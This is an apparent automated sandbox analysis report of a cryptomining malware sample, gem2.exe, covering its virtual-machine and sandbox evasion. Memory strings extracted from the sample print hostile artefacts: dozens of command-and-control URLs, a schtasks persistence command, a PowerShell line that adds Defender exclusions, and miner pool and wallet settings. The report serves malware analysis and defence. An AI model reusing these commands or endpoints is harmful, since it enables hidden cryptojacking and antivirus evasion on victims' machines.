Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contain functionality to detect virtual machines
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: vmware.exe vboxservice.exe vboxservice.exe qemu-ga.exe qemu-ga.exe 14_2_00007FF6A54A7ED0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: VMware VBOX QEMU QEMU 14_2_00007FF6A54A7B10
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: VMware QEMU QEMU 14_2_00007FF6A54A79C0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: VBOX VMWARE 14_2_00007FF6A54A7CC0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: VMware VBOX QEMU QEMU 17_2_00007FF7D1637B10
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: VMware QEMU QEMU 17_2_00007FF7D16379C0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: vmware.exe vboxservice.exe vboxservice.exe qemu-ga.exe qemu-ga.exe 17_2_00007FF7D1637ED0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: VBOX VMWARE 17_2_00007FF7D1637CC0
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT serialnumber FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT serialnumber FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drBinary or memory string: TEMP\.EXEWINDRIVE-.EXEC:\WINDOWS\SYSTEM32\SYSTEM-.EXEC:\WINDOWS\SYSWOW64\$LMX-SOFTWARE\$LMXCONFIG\STARTUPSYSWOW-.EXEC:\WINDOWS\SYSWOW64\$LMX-.EXEC:\PROGRAM FILES (X86)\MICROSOFT\TEMP\MICROSOFT-C:\PROGRAM FILES (X86)\MICROSOFT\TEMPSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNMICROSOFT-://HTTPSABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/HTTPS://PASTESNAP.COM/HTTPS://DEEPSEAHUNTER.COM.DE/HTTPS://PROJECTRETRAC.COM/HTTPS://BRETTDOGECOIN.COM/HTTPS://SYNCAICLOUD.COM/HTTPS://EONFORTNITE.COM/HTTPS://RUSTECHHUB.RU/HTTPS://CREATIVECODER.TOP/HTTPS://NAMESELL.SBS/HTTPS://LEARNTOCODEWITHUS.SU/HTTPS://BURNINGSPICE.CFD/HTTPS://SECURETEXTWEB.CC/HTTPS://WILDLIFY.COM/HTTPS://SPOKOYSTVIEIDUSHA.RU/HTTPS://ADOREBEAUTYZ.TOP/HTTPS://INDEXINFERNO.TOP/HTTPS://SUCCESSFROMWITHIN.RU/HTTPS://TECHVENTURESFROMRUSSIA.SU/HTTPS://INFORTE.TOP/HTTPS://YOURNEXTBIGIDEA.SU/HTTPS://BLUEBULLET.SU/HTTPS://FLIXMI.TOP/HTTPS://LEADINGWORLD.TOP/HTTPS://FEELGOODFOREVER.ORG.RU/HTTPS://RUSSIANTECHINNOVATIONHUB.RU/HTTPS://COOLCARFORUM.COM/HTTPS://RUSSIANCULTURALHERITAGE.RU/HTTPS://EXPLORERUSSIABEYOND.RU/HTTPS://WAVEPASSAGE.CFD/HTTPS://TIFFANYONLINESTORE.TOP/HTTPS://GALAXYGLIMMER.TOP/HTTPS://CODEMASTERSHUB.SU/HTTPS://LEARNTOCODEWITHUS.SU/HTTPS://GAMERGATEGAMES.TOP/HTTPS://JOBSCONTEXT.TOP/.EXEWINDRIVE-URL CHECKER:////.EXEC:\WINDOWS\SYSTEM32\SYSTEM-SYSTEM-" /SC ONLOGON /RL HIGHEST /F" /TR "SCHTASKS /CREATE /TN "SYSTEMMANUFACTURERHARDWARE\DESCRIPTION\SYSTEM\BIOSVMWAREVIRTUALBOXQEMUMICROSOFT CORPORATIONPARALLELS0SYSTEM\CURRENTCONTROLSET\SERVICES\DISK\ENUM0SYSTEM\CURRENTCONTROLSET\SERVICES\DISK\ENUMVMWAREVBOXQEMUVBOXVMWAREPARALLELSVMWARE.EXEVBOXSERVICE.EXEQEMU-GA.EXEHTTP://WWW.GOOGLE.COMPOWERSHELL.EXE -COMMAND "ADD-MPPREFERENCE -EXCLUSIONEXTENSION '.EXE'; ADD-MPPREFERENCE -EXCLUSIONPROCESS 'SVCHOST.EXE'"GLOBAL\E788D6624AWAITING FOR INTERNET CONNECTION...//M.TXTSTB/GLOBAL\F4855F59E0WAITING FOR INTERNET CONNECTION...//M.TXTSTB/TEMP\TM
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drBinary or memory string: QEMU-GA.EXE
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: CURL -S HTTP://IPINFO.IO/COUNTRYNVIDIAAMDNTDLL.DLLRTLGETVERSIONWINDOWS 11WINDOWS 10WINDOWS 8.1WINDOWS 8WINDOWS 7WINDOWS XPN/AEP.PHPAPI/10&STUB_VERSION=&OS_VERSION=&HAS_GPU=&STATUS=ONLINE&MINING_STATUS=&RAM_VRAM=&HARDWARE=&COUNTRY=&OWNER_ID=&HWID=&IP_ADDRESS=PC_NAME=HWID=E2D6CBD0E29B34BC6ADBD3513173B3B0D13F364FB7317D5F&API_KEY=DATA=&ID=GSS.PHP?API_KEY=TASKMGR.EXEPROCESSHACKER.EXEMSIAFTERBURNER.EXEHWMONITOR.EXERIVATUNER.EXEPROCESSEXPLORER.EXEGEFORCEEXPERIENCE.EXEGPU-Z.EXEXR.TXTPLD/HTTPKAWPOWFIROPOWWR.TXTNEXAETCHASHETHASHALEPHCTXCFLUXKARLSENV2PYRINV2EQUI144_5AUTOLYKOS2BEAMLR.TXT&SETTINGS_TYPE=GUS.PHP?API_KEY=5GB_GPU4GB_GPU_COIN_PORT:_POOL_WORKER%GPU%/_WALLETPROXY_HOSTPROXY_PORTPMWAPMWGRVNNEOXANEURAICLOREFIROETCETHWCORTEXKARLSENPYRINERGOBTGUNKNOWNCPUCPU_COINCPU_PORTCPU_POOLCPU_WORKERCPU_WALLETXMRRX/0ZEPHYRSALVIUMCPU_MAXCPU_IDLESOFTWARE\VALVE\STEAMRUNNINGAPPID --USER --URL " --ALGO " --PROXY= --CPU-MAX-THREADS-HINT=PMWA, USER IS IDLE NOT STARTING MINING.V.PHPTASK MANAGER OPENED, PAUSING MININGIDLE STATUS CHANGED, RESTARTING MINING PROCESS... --PROXY --URL STRATUM+TCP:// --POOL " --COIN --SOCKS5 --PERS BGOLDPOW&USER_ID=CIE.PHP?HWID=CU.PHP?API_KEY=\"GUW.PHP?ID=,
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetAdaptersInfo,14_2_00007FF6A54A7DA0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetAdaptersInfo,17_2_00007FF7D1637DA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5943Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3794Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1480Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4515Jump to behavior
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 584
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4151
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5848
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 6819
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 3091
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9863
Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_16-86225
Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 5.2 %
Source: C:\Windows\System32\System-f4855f59e0.exeAPI coverage: 2.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 4240Thread sleep count: 79 > 30Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 4240Thread sleep time: -79000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3028Thread sleep count: 169 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3028Thread sleep time: -169000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 1480 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 4515 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 4308Thread sleep count: 584 > 30
Source: C:\Windows\System32\dllhost.exe TID: 4308Thread sleep time: -58400s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 5528Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep count: 4151 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep time: -4151000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep count: 5848 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep time: -5848000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep count: 6819 > 30
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep time: -6819000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep count: 3091 > 30
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep time: -3091000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2060Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 2060Thread sleep time: -246000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5188Thread sleep count: 9863 > 30
Source: C:\Windows\System32\dwm.exe TID: 5188Thread sleep time: -9863000s >= -30000s
Source: C:\Windows\System32\ReAgentc.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968D880 FindFirstFileExW,9_2_000001F5A968D880
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FB848 FindFirstFileExW,14_2_00007FF6A54FB848
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0A4A0 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,16_2_00000173CFC0A4A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BD880 FindFirstFileExW,16_2_00000173D03BD880
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B848 FindFirstFileExW,17_2_00007FF7D168B848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: lsass.exe, 00000039.00000000.1517744463.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: VMware
Source: ReAgentc.exe, 0000001E.00000003.1452197237.0000021ED6EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: lsass.exe, 00000039.00000000.1517744463.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: vmware.exe
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drBinary or memory string: qemu-ga.exe
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: TEMP\.exeWinDrive-.exeC:\Windows\System32\System-.exeC:\Windows\SysWOW64\$LMX-SOFTWARE\$LMXconfig\startupSysWOW-.exeC:\Windows\SysWOW64\$LMX-.exeC:\Program Files (x86)\Microsoft\Temp\Microsoft-C:\Program Files (x86)\Microsoft\TempSoftware\Microsoft\Windows\CurrentVersion\RunMicrosoft-://httpsABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/https://pastesnap.com/https://deepseahunter.com.de/https://projectretrac.com/https://brettdogecoin.com/https://syncaicloud.com/https://eonfortnite.com/https://RusTechHub.ru/https://creativecoder.top/https://namesell.sbs/https://LearnToCodeWithUs.su/https://burningspice.cfd/https://securetextweb.cc/https://wildlify.com/https://spokoystvieidusha.ru/https://adorebeautyz.top/https://indexinferno.top/https://SuccessFromWithin.ru/https://TechVenturesFromRussia.su/https://inforte.top/https://YourNextBigIdea.su/https://bluebullet.su/https://flixmi.top/https://leadingworld.top/https://FeelGoodForever.org.ru/https://RussianTechInnovationHub.ru/https://coolcarforum.com/https://russianculturalheritage.ru/https://ExploreRussiaBeyond.ru/https://wavepassage.cfd/https://tiffanyonlinestore.top/https://galaxyglimmer.top/https://CodeMastersHub.su/https://LearnToCodeWithUs.su/https://gamergategames.top/https://jobscontext.top/.exeWinDrive-URL Checker:////.exeC:\Windows\System32\System-System-" /SC ONLOGON /RL HIGHEST /F" /TR "SCHTASKS /CREATE /TN "SystemManufacturerHARDWARE\DESCRIPTION\System\BIOSVMwareVirtualBoxQEMUMicrosoft CorporationParallels0SYSTEM\CurrentControlSet\Services\disk\Enum0SYSTEM\CurrentControlSet\Services\disk\EnumVMwareVBOXQEMUVBOXVMWAREPARALLELSvmware.exevboxservice.exeqemu-ga.exehttp://www.google.compowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"Global\e788d6624aWaiting for Internet connection...//M.txtSTB/Global\f4855f59e0Waiting for Internet connection...//M.txtSTB/TEMP\tm
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: VMWARE
Source: lsass.exe, 00000039.00000000.1517744463.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: vboxservice.exe
Source: svchost.exe, 0000003A.00000000.1522768743.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549880016.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1517471519.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000002.2548700013.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000000.1522768743.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, curl.exe, 0000003C.00000003.1547952894.0000023245FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: C:\Users\user\Desktop\gem2.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A9688280 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F5A9688280
